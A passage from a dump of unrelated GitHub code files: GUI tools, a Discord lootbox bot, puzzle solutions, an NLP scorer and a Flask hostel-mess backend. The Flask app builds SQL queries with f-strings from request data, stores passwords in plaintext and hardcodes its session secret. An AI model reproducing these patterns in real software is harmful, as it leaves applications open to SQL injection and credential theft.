ipadx=275, sticky=\"w\")\r\nscrollbar2.config(command=foldentry.xview)\r\nfoldentry.config()\r\n\r\ndef selectgdb():\r\n x = filedialog.askdirectory(title=\"Select GDB\")\r\n datafile = x\r\n foldentry.delete('0', END)\r\n foldentry.insert(END, datafile)\r\n\r\ndataselect = Button(root, text=\"Select GDB folder\", padx=50, command=selectgdb)\r\ndataselect.grid(row=2, 
column=0)\r\n\r\ndef mainrun():\r\n global excelfile_loc\r\n global output_loc\r\n arcpy.env.workspace = foldentry.get()\r\n excelfile_loc = fileentry.get()\r\n updateFunction()\r\n messagebox.showinfo(\"Completed\", \"GDB has been updated!\")\r\n \r\n\r\nrunbutton = Button(root, text=\"Update\", command=mainrun)\r\nrunbutton.grid(row=4, column=0, ipadx=50, sticky=\"w\")\r\n\r\nroot.mainloop()\r\n\r\n","repo_name":"chowe123/GDB-Update-GUI","sub_path":"GDB Template.py","file_name":"GDB Template.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37724598291","text":"from settings import *\r\n\r\nclass Bullet(pg.sprite.Sprite):\r\n\r\n def __init__(self,angle,ppos):\r\n pg.sprite.Sprite.__init__(self)\r\n\r\n\r\n self.og = pg.image.load('Bullet.png')\r\n self.og = pg.transform.scale(self.og,(50,20))\r\n self.ogr = self.og.get_rect(center = ppos)\r\n self.image = pg.transform.rotate(self.og,angle)\r\n self.rect = self.image.get_rect(center = self.ogr.center)\r\n self.speed = 20 #speed of the bullet\r\n self.vel = [self.speed*cos(radians(angle)),self.speed*sin(radians(angle*-1))]#Velocity\r\n self.mask = pg.mask.from_surface(self.image)\r\n\r\n def update(self):\r\n \r\n self.rect.move_ip(self.vel)\r\n\r\n if self.rect.right < 0:\r\n self.kill()","repo_name":"zirolet/Portfolio","sub_path":"Python/Pygame/Shooter/Bullet.py","file_name":"Bullet.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40035725171","text":"from CRUD import fetcher,insertor,user_search\nfrom connect import connector\nfrom flask_cors import CORS\nimport json \nfrom flask import Flask , request, jsonify ,session\nfrom datetime import datetime\nfrom list_dict import convert_to_dict_list\napp = Flask(__name__)\napp.secret_key = 'super secret key'\nCORS(app)\n# conn=None\n\n# global conn \n# just checking\n\nconn,_=connector()\n\n@app.route('/',methods=['POST','GET'])\ndef home():\n \n return \"flask home\"\n\n# @app.route('/list',methods=['POST','GET'])\n# def list():\n# global conn\n# id=request.json['hostelid']\n# print(type(id))\n# query = f\"SELECT * FROM inmate where inmate_id = '{id}';\"\n# print(query)\n# data=fetcher(conn,query)\n \n# return data\n\n@app.route('/userreg' ,methods=['POST','GET'])\ndef reg_user():\n global conn\n conn,_=connector()\n # from post data\n data =request.json\n # print(data)\n \n # print(data['hostelid'],data['password'])\n hostelid =data['hostelid'].upper()\n password =data['password'].upper()\n if hostelid !='' and password !='':\n query1 = f\"SELECT * FROM user_det where inmate_id = '{hostelid}';\"\n data1 =fetcher(conn,query1)\n print(data1)\n if data1 ==[]:\n query = f\"INSERT INTO User_det (inmate_id, password) VALUES ('{hostelid}', '{password}');\"\n query_mess = f\"INSERT INTO mess_out (hostel_id) VALUES ('{hostelid}');\"\n query_dash = f\"INSERT INTO inmate (hostel_id) VALUES ('{hostelid}');\"\n insertor(conn,query)\n insertor(conn,query_mess)\n response_data = {'message': 'Data received successfully', 'status': 200}\n return jsonify(response_data)\n else:\n response_data = {'message': 'User already exists', 'status': 404}\n return jsonify(response_data)\n else:\n response_data = {'message': 'Data not received', 'status': 405 }\n return jsonify(response_data)\n\n\n@app.route('/userlog' ,methods=['POST','GET'])\ndef log_user():\n conn,_=connector()\n data =request.json\n \n 
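# Note (illustrative): building SQL with f-strings, as above, is open to SQL injection;\n # with a DB-API style cursor the query could be parameterized instead, e.g.\n # cursor.execute('SELECT * FROM user_det WHERE inmate_id = %s', (hostelid,))\n 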
hostelid =data['hostelid'].upper()\n password =data['password'].upper()\n if hostelid =='' or password =='':\n response_data = {'message': 'Data not received', 'status': 405 }\n return jsonify(response_data)\n query = f\"SELECT * FROM user_det where inmate_id ='{hostelid}';\"\n\n \n # print(query)\n data =user_search(conn,query)\n print(data)\n \n if data is not None and hostelid == data[0] and password == data[1]:\n response_data = {'key':hostelid,'message': 'User logged in successfully', 'status': 200}\n return jsonify(response_data)\n \n else:\n response_data = {'message': 'Login Unsuccessful', 'status': 404}\n return jsonify(response_data)\n\n@app.route('/userlogout' )\ndef logout_user():\n uid=session.get('userid', None)\n session.pop('userid', None)\n response_data = {'message': \"log out successful\", 'status': 200}\n return jsonify(response_data)\n\n@app.route('/dash' ,methods=['GET','POST'])\ndef dash():\n conn,_=connector()\n key =request.json\n id=key['hostelid']\n id=id.upper()\n query = f\"SELECT * FROM inmate where hostel_id = '{id}';\"\n data =fetcher(conn,query)\n \n return data\n\n\n@app.route('/messreq' ,methods=['GET','POST'])\ndef messreq():\n\n # conn,_=connector()\n data =request.json\n print(data['messmode'])\n if data['messmode'] == 'MESSOUT':\n query = f\"SELECT mess_mode FROM mess_out where hostel_id = '{data['hostel_id']}';\"\n fetch_data =fetcher(conn,query)\n print(fetch_data[0][0])\n if fetch_data[0][0]:\n response_data = {'message': 'Mess request already sent', 'status': 410}\n return jsonify(response_data)\n\n query = f\"UPDATE mess_out SET mess_mode = 'true', date = '{data['date']}' WHERE hostel_id = '{data['hostel_id']}';\"\n\n print(\"query\",query)\n insertor(conn,query)\n response_data = {'message': 'Mess request sent successfully', 'status': 200}\n return jsonify(response_data)\n elif data['messmode'] == 'MESSIN':\n query = f\"SELECT date FROM mess_out where hostel_id = '{data['hostel_id']}';\"\n fetch_date =fetcher(conn,query)\n date_object = fetch_date[0][0]\n # #########################################\n mess_out_date = date_object.strftime('%m/%d/%Y')\n mess_in_date=data['date']\n # ##########################################\n mess_out_date_1 = datetime.strptime(mess_out_date, '%m/%d/%Y').date()\n mess_in_date_2 = datetime.strptime(mess_in_date, '%m/%d/%Y').date()\n # #############################################\n print(mess_in_date_2)\n print(mess_out_date_1)\n diff=mess_in_date_2-mess_out_date_1\n print(diff.days)\n number_of_days=diff.days\n # #############################################\n query = f\"UPDATE mess_out SET mess_mode = 'false' WHERE hostel_id = '{data['hostel_id']}';\"\n insertor(conn,query)\n query =f\"insert into mess_out_hist (hostel_id, messout_date,messin_date, days) values ('{data['hostel_id']}','{mess_in_date}','{mess_out_date}',{number_of_days});\"\n insertor(conn,query)\n\n\n response_data = {'message': 'Mess request sent successfully', 'status': 200}\n return jsonify(response_data)\n data=jsonify(\"data\",\"data\")\n return data\n\n@app.route('/mess_hist' ,methods=['GET','POST'])\ndef mess_hist():\n conn,_=connector()\n data =request.json\n id=data['hostelid']\n query = f\"SELECT * FROM mess_out_hist where hostel_id = '{id}';\"\n data =fetcher(conn,query)\n dict_data=convert_to_dict_list(data)\n \n \n return dict_data\n\nif __name__ == '__main__':\n 
app.run(debug=True)","repo_name":"ananthu666/HMMS-backend","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12654548735","text":"import random\nimport time\nfrom azure.iot.device import IoTHubDeviceClient, Message\n\nCONNECTION_STRING = \"YOUR CONNECTION STRING\" \n\ndef output_to_dict(result_path):\n # Parse the result.txt file from the command line call\n with open(result_path) as f:\n begin = False\n EIP_count = 0\n output = []\n for line in f:\n if \"Enter Image Path:\" in line:\n EIP_count += 1\n if begin == True and EIP_count == 1:\n result = line.split(\"\\t\")\n output.append(result[0])\n if \"./img.jpg\" in line:\n begin = True\n \n # Replace the keys with your class names\n count_items = {\"Egg\" : 0,\n \"Milk\" : 0,\n \"Yoghurt\": 0}\n\n # Increment the count of the relevant class for each instance\n for item in output:\n result = item.split(\":\")\n item_type = result[0]\n count_items[item_type] += 1\n\n return count_items\n \ndef iothub_client_init(): \n client = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING) \n return client \n \ndef iothub_client_send_telemetry(message): \n client = iothub_client_init() \n print(\"Attempting to Send Messages to Azure IoT\") \n print(\"Sending message: {}\".format(message)) \n client.send_message(message) \n print(\"Message Sent\")\n \nif __name__ == '__main__': \n message = output_to_dict('result.txt')\n iothub_client_send_telemetry(str(message)) \n","repo_name":"supperted825/RPi_SmartInventoryTracker","sub_path":"parseSendData.py","file_name":"parseSendData.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"25905690646","text":"# file: overwatchdiscordbot.py\n# desc: A bot for the VOIP app discord that simulates opening\n# lootboxes in the PC game Overwatch\n\nimport asyncio\nfrom datetime import datetime\nimport discord\nfrom discord.ext import commands\nimport json\nfrom pprint import pprint\nimport random\n\n# File containing the bot's secret token\ntoken_filename = \"tokens\\\\token.dat\"\n\n# The bot will only react to command messages that are prefaced by this\ncommand_prefix = \"!\"\n\n# Description of the bot\ndescription = \"Discord bot that simulates opening lootboxes\"\n\n# File for log output\nlog_filename = \"logs\\\\log_\" + str(datetime.now().date())+ \".dat\"\n\n# Files for items\nepic_filename = \"items\\\\epic.json\"\nrare_filename = \"items\\\\rare.json\"\ncommon_filename = \"items\\\\common.json\"\nlegendary_filename = \"items\\\\legendary.json\"\n\n# Site that hosts the images for us lmao\nimage_host_prefix = \"https://overwatchitemtracker.com/resources\"\n\n# Compounded Lootbox Probabilities in range [0,1]\nprob_common = 0.5820\nprob_rare = 0.8990\nprob_epic = 0.9745\nprob_legend = 1\n\n# Discord emojis that represent rarity\nicon_common = \":grey_exclamation:\"\nicon_rare = \":small_blue_diamond:\"\nicon_epic = \":purple_heart:\"\nicon_legend = \":large_orange_diamond:\"\n\n# Load the items\nlist_epic = json.load(open(epic_filename, \"r\"))[\"items\"]\nlist_rare = json.load(open(rare_filename, \"r\"))[\"items\"]\nlist_common = json.load(open(common_filename, \"r\"))[\"items\"]\nlist_legendary = json.load(open(legendary_filename, \"r\"))[\"items\"]\n\nbot = commands.Bot(command_prefix=command_prefix, description=description)\nlog_file = 
open(log_filename, \"a\")\n\n# Generate 4 random items representing a lootbox\ndef genItems():\n items = []\n rare_gen = False\n for _ in range(4):\n rarity = genRarity()\n if(not rare_gen and rarity != icon_common):\n rare_gen = True\n if rarity == icon_common:\n item = random.choice(list_common)\n items.append((rarity, item[\"id\"], item[\"url\"]))\n elif rarity == icon_rare:\n item = random.choice(list_rare)\n items.append((rarity, item[\"id\"], item[\"url\"]))\n elif rarity == icon_epic:\n item = random.choice(list_epic)\n items.append((rarity, item[\"id\"], item[\"url\"]))\n else:\n item = random.choice(list_legendary)\n items.append((rarity, item[\"id\"], item[\"url\"])) \n if not rare_gen:\n item = random.choice(list_rare)\n items[random.randint(0,3)] = (icon_rare, item[\"id\"], item[\"url\"])\n return items\n\n# Generate a rarity and return the emoji representing that rarity\ndef genRarity():\n roll = random.random()\n if roll < prob_common:\n return icon_common\n elif roll < prob_rare:\n return icon_rare\n elif roll < prob_epic:\n return icon_epic\n else:\n return icon_legend\n\n# Logs all the bot's interactions to a stream\ndef log(string):\n\t# print(str(datetime.now()) + \" : \" + string)\n print(str(datetime.now()) + \" : \" + string, file = log_file)\n log_file.flush()\n\n# Retrieves the bot's secret token from a file\ndef retrieveToken():\n handle = open(token_filename, \"r\")\n return handle.readline()\n\n# Called after bot.run when bot is ready for commands\n@bot.event\n@asyncio.coroutine\ndef on_ready():\n log(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n log(\"Bot starting . . .\")\n log(\"Logged in as: \" + bot.user.name)\n log(\"Client ID: \" + bot.user.id)\n game = discord.Game(name=(\"Type \" + command_prefix + \"info for commands.\"))\n yield from bot.change_presence(game=game, status=discord.Status.online)\n\n# Simulates opening a lootbox\n@bot.command(pass_context=True)\n@asyncio.coroutine\ndef lootbox(ctx):\n author = str(ctx.message.author)\n items = genItems()\n log(author + \" is opening a lootbox.\")\n embed = discord.Embed(color=0x9932cc)\n embed.add_field(name=items[0][0], value= \"[\" + items[0][1] + \"](\" +image_host_prefix + items[0][2] + \")\", inline=True)\n embed.add_field(name=items[1][0], value= \"[\" + items[1][1] + \"](\" +image_host_prefix + items[1][2] + \")\", inline=True)\n embed.add_field(name=\"You opened a lootbox!\", value = \"click the links to view the items you found\", inline=False)\n embed.add_field(name=items[2][0], value= \"[\" + items[2][1] + \"](\" +image_host_prefix + items[2][2] + \")\", inline=True)\n embed.add_field(name=items[3][0], value= \"[\" + items[3][1] + \"](\" +image_host_prefix + items[3][2] + \")\", inline=True)\n yield from bot.reply(\"\", embed=embed)\n\n# Info about the bot\n@bot.command(pass_context=True)\n@asyncio.coroutine\ndef info(ctx):\n author = str(ctx.message.author)\n log(author + \" is requesting info\")\n embed = discord.Embed(title = \"Info\", color=0xffa500, description= \n \"This bot lets you open imaginary Overwatch lootboxes.\\n\"+\n \"Currently the supported only commands are as follows:\\n\\n\"+\n command_prefix + \"info -------- displays this message\\n\"+\n command_prefix + \"lootbox ----- opens a lootbox\\n\\n\"+\n \"Planned features include mass opening, inventory tracking, and keeping a count of the boxes opened for each user\\n\\n\"\n \"Source code located [here](https://github.com/jroscoe5/Overwatch-Lootbox-Simulator) (feel free to clean up my ugly code)\"\n )\n yield from 
bot.say(embed=embed)\n\nif __name__ == \"__main__\":\n\tprint(\"Logging to: \" + log_filename)\n\tbot.run(retrieveToken())","repo_name":"jroscoe5/Overwatch-Lootbox-Simulator","sub_path":"overwatchdiscordbot.py","file_name":"overwatchdiscordbot.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39090919237","text":"#!/usr/bin/python3\n\"\"\" Unittests for file_storage and all its attributes and methods\n\"\"\"\nimport json\nfrom models import storage\nfrom models.base_model import BaseModel\nfrom models.engine.file_storage import FileStorage\nimport pep8\nimport os\nfrom os.path import exists\nimport sys\nimport unittest\n\n\nclass TestFileStorage(unittest.TestCase):\n \"\"\" Tests File_Storage Class \"\"\"\n\n def FileStorage(self):\n \"\"\" tests for file_storage \"\"\"\n self.assertTrue(hasattr(FileStorage, \"all\"))\n self.assertTrue(hasattr(FileStorage, \"new\"))\n self.assertTrue(hasattr(FileStorage, \"save\"))\n self.assertTrue(hasattr(FileStorage, \"reload\"))\n self.assertTrue(FileStorage.all.__doc__)\n self.assertTrue(FileStorage.new.__doc__)\n self.assertTrue(FileStorage.save.__doc__)\n self.assertTrue(FileStorage.reload.__doc__)\n\n def test_all(self):\n \"\"\" tests all method of file_storage \"\"\"\n myobj = BaseModel()\n __objects = storage.all()\n\n def test_new(self):\n \"\"\" tests new method of file_storage \"\"\"\n myobj = BaseModel()\n # store myobj into __objects variable by .id using new()\n __objects = storage.new(myobj)\n\n def test_save(self):\n \"\"\" tests save method of file_storage \"\"\"\n __file_path = \"file.json\"\n storage.save()\n # check if file.json file was created by save method\n self.assertTrue(exists(__file_path))\n\n def test_reload(self):\n \"\"\" tests reload method of file_storage \"\"\"\n myobj = BaseModel()\n __objects = storage.all()\n storage.reload()\n __objects_reloaded = storage.all()\n self.assertEqual(__objects, __objects_reloaded)\n","repo_name":"laurendobratz00/AirBnB_clone","sub_path":"tests/test_models/test_engine/test_file_storage.py","file_name":"test_file_storage.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18100435066","text":"# Hi, here's your problem today. This problem was recently asked by Microsoft:\n\n#You are given an array of integers. Return the largest product that can be made by multiplying any 3 integers in the array.\n\n#Example:\n\n#[-4, -4, 2, 8] should return 128 as the largest product can be made by multiplying -4 * -4 * 8 = 128.\n\n# okay, so this problem has a little bit of trick that comes with it. Right away, you know you can \n# do this in O(N^3) time. That's pretty simple. Just create three loops and find the greatest multiple\n# great, but not great! Then, I was thinking to myself, since I've been doing so much DP\n# why don't I create a matrix that has all the products of pairs of two numbers from the array\n# then I can loop over this matrix and multiply these numbers by the numbers in the array again...\n# wait that's N^3 as well... okay, let's keep thinking about this matrix, what numbers do I really \n# want to try multiplying when I get to this product. I always want to check multiplying the greatest\n# number and the smallest number in the array of numbers. The reason we check the smallest number\n# is because of negatives. 
By including negative numbers, we have to take into account that the first\n# two numbers that create a product might become negative, but that number can then be made\n# positive by multiplying a very small (extremely negative) number to that product. So then I thought\n# wait a minute, by using this idea of the matrix, I don't actually need to store all of the products\n# anymore, I can keep the intuition that I'm using a matrix, but when I get the two-number product, I check\n# to see if I am using the index that contains the max_i position or the min_i position, I then\n# multiply it through if I'm not using one of those and take the max with my current max product!!!\n\n# we have now decreased the complexity to O(n^2) time and O(1) space!!!! But wait, can we do better...\n\ndef three_num_max_product(nums):\n    min_pos = nums.index(min(nums))\n    max_pos = nums.index(max(nums))\n    max_prod = float('-inf')  # start below any real product so all-negative inputs work too\n\n    for i in range(len(nums)):\n        for j in range(i+1, len(nums)):\n            two_product = nums[i] * nums[j]\n            if i != max_pos and j != max_pos: # we can include max in the product\n                max_prod = max(max_prod, two_product * nums[max_pos])\n            if i != min_pos and j != min_pos: # we can include the min\n                max_prod = max(max_prod, two_product * nums[min_pos])\n\n    return max_prod\n\nnums = [-4, -4, 2, 8]\nnums2 = [-1, 10, -100, 5]\nnums3 = [-1, 20, 100, 2, 5, -3, -10]\n\nprint(three_num_max_product(nums))\nprint(three_num_max_product(nums2))\nprint(three_num_max_product(nums3))\n\n# but then wait, let's think about why we just stored the max and the mins of the number\n# when we went through to get the greatest product? When we compute the max product,\n# the max product will be the product of the THREE LARGEST numbers, or the largest number\n# and the TWO SMALLEST numbers. The reason it's the two smallest and not the three smallest\n# is because let's say we have three negative numbers, the product will now also be negative\n# so this doesn't help us at all. But if we take the two smallest, and multiply the number\n# by the largest in the array, then we get the largest product (of course, that being when\n# the two smallest's product is greater than the second and third greatest). Okay, so what is\n# the best way to keep track of these? We can use a max heap for the smallest numbers\n# and a min heap for the largest numbers, We then get to a number and check to see if it's \n# less than the greatest of the min numbers, if so, we replace that number and reheapify.\n# for the min heap, we check to see if the number is greater than the smallest number in the \n# min heap, and we replace and heapify based on that. Okay, great. We can now take the \n# product of the max heap and the largest number in the min heap and then we can max that\n# with the product of the min heap. Let's do that! BTW this will be O(1) space and O(N) time\n# because the heap size does not depend on the input. No matter how big the input grows,\n# the heap size will always be 3 and 2. 
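(Illustrative check: with nums = [-4, -4, 2, 8] the two smallest are -4 and -4, whose\n# product is 16; the largest is 8, and 16 * 8 = 128 matches the first example above.)\n# 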
If you don't understand that, then look at big O documentation\n\nimport heapq\n\ndef product(arr):\n    if len(arr) == 0 or not arr: return 0\n    result = arr[0]\n    for x in arr[1:]:\n        result *= x\n    return result\n\n\ndef max_triple_prod(nums):\n    smallest_heap = [] # max of the mins (we multiply by negative 1 to allow us to use min heap still)\n    largest_heap = [] # mins of the maxs\n\n    for num in nums:\n        if len(smallest_heap) < 2:\n            heapq.heappush(smallest_heap, (-1*num))\n        elif smallest_heap[0] < num*-1:\n            heapq.heappushpop(smallest_heap, (-1*num))\n        \n        if len(largest_heap) < 3:\n            heapq.heappush(largest_heap, num)\n        elif largest_heap[0] < num:\n            heapq.heappushpop(largest_heap, num)\n    \n    return max(product(largest_heap), product(smallest_heap) * max(largest_heap))\n\nprint('second style')\nprint(max_triple_prod(nums))\nprint(max_triple_prod(nums2))\nprint(max_triple_prod(nums3))\n \n\n","repo_name":"Bradysm/daily_coding_problems","sub_path":"largestThreeNumProduct.py","file_name":"largestThreeNumProduct.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"69854645838","text":"# -*- encoding: utf-8 -*-\n'''\n@File    :   剑指 Offer 40. 最小的k个数.py\n@Time    :   2022/05/24 17:24:23\n@Author  :   henfy\n@Diffi   :   Easy\n@Method  :   Sorting (medium)\n\nProblem: https://leetcode.cn/problems/zui-xiao-de-kge-shu-lcof/\n'''\n\n\nfrom typing import List\n\n\nclass Solution:\n    def getLeastNumbers(self, arr: List[int], k: int) -> List[int]:\n        # arr.sort()\n        # # print(arr)\n        # return arr[:k]\n\n        # quick sort\n        # def quick_sort(arr, l, r):\n        #     # stop the recursion once the subarray has length 1\n        #     if l >= r:\n        #         return\n        #     # sentinel partition (using arr[l] as the pivot)\n        #     i, j = l, r\n        #     while i < j:\n        #         while i < j and arr[j] >= arr[l]:\n        #             j -= 1\n        #         while i < j and arr[i] <= arr[l]:\n        #             i += 1\n        #         arr[i], arr[j] = arr[j], arr[i]\n        #     arr[l], arr[i] = arr[i], arr[l]\n        #     # recursively run the sentinel partition on the left (right) subarray\n        #     quick_sort(arr, l, i - 1)\n        #     quick_sort(arr, i + 1, r)\n\n        # quick_sort(arr, 0, len(arr) - 1)\n        # return arr[:k]\n\n        # array partitioning based on quick sort (quickselect)\n        if k >= len(arr):\n            return arr\n\n        def quick_sort(l, r):\n            i, j = l, r\n            while i < j:\n                while i < j and arr[j] >= arr[l]:\n                    j -= 1\n                while i < j and arr[i] <= arr[l]:\n                    i += 1\n                arr[i], arr[j] = arr[j], arr[i]\n            arr[l], arr[i] = arr[i], arr[l]\n            if k < i:\n                return quick_sort(l, i - 1)\n            if k > i:\n                return quick_sort(i + 1, r)\n            return arr[:k]\n\n        return quick_sort(0, len(arr) - 1)\n\n\nif __name__ == '__main__':\n    s = Solution()\n    test_list = [\n        ([3, 2, 1], 2, [1, 2]),\n        ([0, 1, 2, 1], 1, [0]),\n    ]\n\n    for test_index, test_case in enumerate(test_list, start=1):\n        *test, result = test_case\n        test_result = s.getLeastNumbers(*test)\n        if test_result != result:\n            raise ValueError(\"\\n testcase %d error:\\n expect: %s \\n actually %s\" % (\n                test_index, result, test_result))\n        print(\"test_case %d succeed.\" % test_index)\n","repo_name":"henfy233/leetcode","sub_path":"剑指Offer/剑指 Offer 40. 最小的k个数.py","file_name":"剑指 Offer 40. 
最小的k个数.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"82545902","text":"from ..models.BalancedDex import BalancedDex\nfrom fastapi import APIRouter\nfrom pydantic import BaseModel\n\nrouter = APIRouter(prefix=\"/dex\")\n\n# Initialize BalancedDex class.\nbalanced_dex = BalancedDex()\n\n\nclass MarketQuote(BaseModel):\n sicx_icx_quote: str\n sicx_bnusd_quote: str\n baln_bnusd_quote: str\n baln_sicx_quote: str\n\n\n@router.get(\"/quote/\", response_model=MarketQuote)\nasync def get_market_quotes():\n market_quotes = balanced_dex.get_market_quotes()\n sicx_icx_quote = market_quotes[0]\n sicx_bnusd_quote = market_quotes[1]\n baln_bnusd_quote = market_quotes[2]\n baln_sicx_quote = market_quotes[3]\n return {\n \"sicx_icx_quote\": sicx_icx_quote,\n \"sicx_bnusd_quote\": sicx_bnusd_quote,\n \"baln_bnusd_quote\": baln_bnusd_quote,\n \"baln_sicx_quote\": baln_sicx_quote\n }\n","repo_name":"nneessen/balanced-stats-api","sub_path":"app/routers/balanced_dex.py","file_name":"balanced_dex.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4084281435","text":"#!/usr/bin/env python3\n\nimport json\nimport itertools\nimport ast\nimport argparse\nimport os\nimport pandas as pd\nfrom collections import defaultdict\nimport nltk\nimport string\nimport operator\nimport math\nimport re\n\n#################################################\n#\n# Begin processing\n# Three steps to this. \n#\n#################################################\n\ndef sents_and_weights(d,paragraphs):\n \"\"\"Clean sentences, remove digit, punctuation, upper case to lower\n Args: d,paragraphs = d is article number within file, paragraphs is just paragraphs\n Return: \n labeled sentences: \n stemmed sentences:\n word distribution: \n \"\"\" \n # Create dictionaries for labeled & stemmed sentences to populate\n labeled_sentences = {}\n stemmed_sentences = {}\n\n # Create word distribution dictionaries\n # these needs to be a default dict so it returns 0 if word not found \n word_cts = defaultdict(int)\n word_distr = defaultdict(int)\n\n # initialize for stemming\n stop_words = nltk.corpus.stopwords.words('english')\n stemmer = nltk.stem.PorterStemmer()\n tokenize = nltk.word_tokenize\n sent_splitter = nltk.data.load('tokenizers/punkt/english.pickle')\n\n # helper function for tracking stemmed words\n def stem_and_add(wd):\n word_cts[wd] += 1\n word_cts['total_count'] += 1\n return stemmer.stem(wd)\n\n # need to go through each 'paragraph' (context) to gather info about sentences\n for i,context in enumerate(paragraphs):\n\n paragraph = context['context']\n # split paragraph into sentences, make sure to keep digits, etc. together\n #sentences = context['context'].split('. 
') #last one still has a period at the end\n\n #print(len(paragraph))\n\n if len(paragraph) > 75:\n sentences = sent_splitter.tokenize(context['context'].strip())\n else: \n break\n\n # iterate through sentences to tokenize, calculate overall word distribution\n for j,original_sentence in enumerate(sentences):\n\n # Remove all digits\n sentence = ''.join([x for x in original_sentence if not x.isdigit()])\n # Remove all punctuation (OK to include periods since it's been split)\n sentence = ''.join([x for x in sentence if x not in string.punctuation])\n\n # Lowercase everything\n sentence = sentence.strip()\n sentence = sentence.lower()\n\n # Split into words & rejoin (remove extra spaces)\n sentence = ' '.join(sentence.split())\n\n tokenized_stemmed_sent = [stem_and_add(word) for word in nltk.tokenize.word_tokenize(sentence) \n if not word in stop_words]\n\n # keep track of tokenized for calculating sentence weight in next step\n # save list of unprocessed sentences for later\n # but we're only selecting from the first and last sentences in the paragraphs\n if (original_sentence == sentences[0]) | (original_sentence == sentences[-1]):\n if not original_sentence.startswith('[[File:'):\n labeled_sentences[(d,i,j)] = original_sentence.replace('\\n', ' ')\n stemmed_sentences[(d,i,j)] = tokenized_stemmed_sent\n\n # update our word dictionary to be relative frequencies rather than absolute values\n for word, ct in word_cts.items():\n # but keep our total count, we may want that later (not sure)\n if not word == 'total_count':\n word_distr[word] = word_cts[word] / word_cts['total_count']\n \n #print(sorted(word_distr.items(), key=lambda k: k[1], reverse=True))\n return labeled_sentences,stemmed_sentences,word_distr\n \ndef calc_sent_weight(word_dist, stemmed_sents):\n \"\"\"Compute weight with respect to sentences\n Args:\n word_distribution: dict with word: weight\n stemmed_sents: list with \n Return:\n sentence_weight: dict of weight of each sentence. key = sentence #, value = weight\n \"\"\"\n sentences_weight = {}\n # Iterate through each word in each sentence, if word distribution and sentence id are in dictionary, \n # add to existing word distribution. 
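For example (illustrative): a sentence whose stemmed words are ['viru', 'spread'], with\n    # relative frequencies 0.02 and 0.01 in word_dist, gets weight (0.02 + 0.01) / 2 = 0.015.\n    # 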
Else, sentence weight for given sentence equals current word distribution\n    \n    for key, words in stemmed_sents.items():\n        #print(words)\n        # Sentence weight equals sum of word distributions divided by length of cleaned sentence\n        if len(words) == 0:\n            weight = 0\n        else:\n            weight = sum([word_dist[word] for word in words]) / len(words)\n        \n        sentences_weight[key] = weight\n        \n    sentences_weight = sorted(sentences_weight.items(), key=operator.itemgetter(1), reverse=True)\n    #print('sentence weight: ',sentences_weight)\n\n    return sentences_weight\n    \ndef topically_important_sentence(sentences_weight, labeled_sentences):\n    \"\"\"Select topically important sentences\n    Args:\n        sentences_weight: list of tuples, (sentence_num, sentence_weight) computed in calc_sent_weight\n        labeled_sentences: dict of the original sentences, keyed like the stemmed ones\n    Return:\n        sentences_selected: dict, topically important sentences selected\n    \"\"\"\n    final_sentences = {}\n    \n    total_sentences = len(sentences_weight)\n    # how many sentences to retain\n    num_sentences_selected = math.ceil(float(0.20) * total_sentences)\n    \n    # key of selected sentences (# order of sentence in paragraph)\n    #sentences_selected_key = []\n    \n    # dictionary of all sentences \n    sentences_dict = {}\n    flag = 0\n    \n    # select num_sentences_selected # of sentences from list of sentence weights\n    selected_keys = [k for k,v in sentences_weight[0:num_sentences_selected]]\n\n    for sent_key in selected_keys:\n        pre_processed_sentence = labeled_sentences[sent_key]\n        \n        processed_sentence = pre_processed_sentence.lower() #lowercase\n        processed_sentence = processed_sentence.replace('[[','') # remove brackets indicating links\n        processed_sentence = processed_sentence.replace(']]','')\n        processed_sentence = processed_sentence.replace(']','')\n        processed_sentence = processed_sentence.replace('[','')\n        processed_sentence = re.sub('(?
None:\n self._filepath = filepath\n self._reader = reader\n self._filter_algorithm = timestamp_filter_algorithm\n\n logger.debug(\n f\"Creating instance:\"\n f\"filepath: {self._filepath}\"\n f\"reader: {self._reader}\"\n f\"timestamp_filter_algorithm: {self._filter_algorithm}\"\n )\n\n def load_weather(self,\n start_datetime: Optional[pd.Timestamp] = None,\n end_datetime: Optional[pd.Timestamp] = None\n ) -> pd.DataFrame:\n logger.debug(\"Loading weather\")\n weather_df = self._load_from_file()\n weather_df = self._filter_by_timestamp(end_datetime, start_datetime, weather_df)\n return weather_df\n\n def _load_from_file(self):\n filepath = os.path.abspath(self._filepath)\n logger.debug(f\"Loading weather from {filepath}\")\n with open(filepath, mode=\"rb\") as input_file:\n weather_df = self._reader.read_weather_from_binary_stream(input_file)\n return weather_df\n\n def _filter_by_timestamp(self, end_datetime, start_datetime, weather_df):\n weather_df = self._filter_algorithm.filter_df_by_min_max_timestamp(\n weather_df,\n start_datetime,\n end_datetime\n )\n return weather_df\n","repo_name":"cool-soft/boiler","sub_path":"src/boiler/weather/io/sync_weather_file_loader.py","file_name":"sync_weather_file_loader.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8516097451","text":"\nfrom colorama import Fore\nimport requests\nfrom bs4 import BeautifulSoup\n\ncity = input(\"Enter city name: 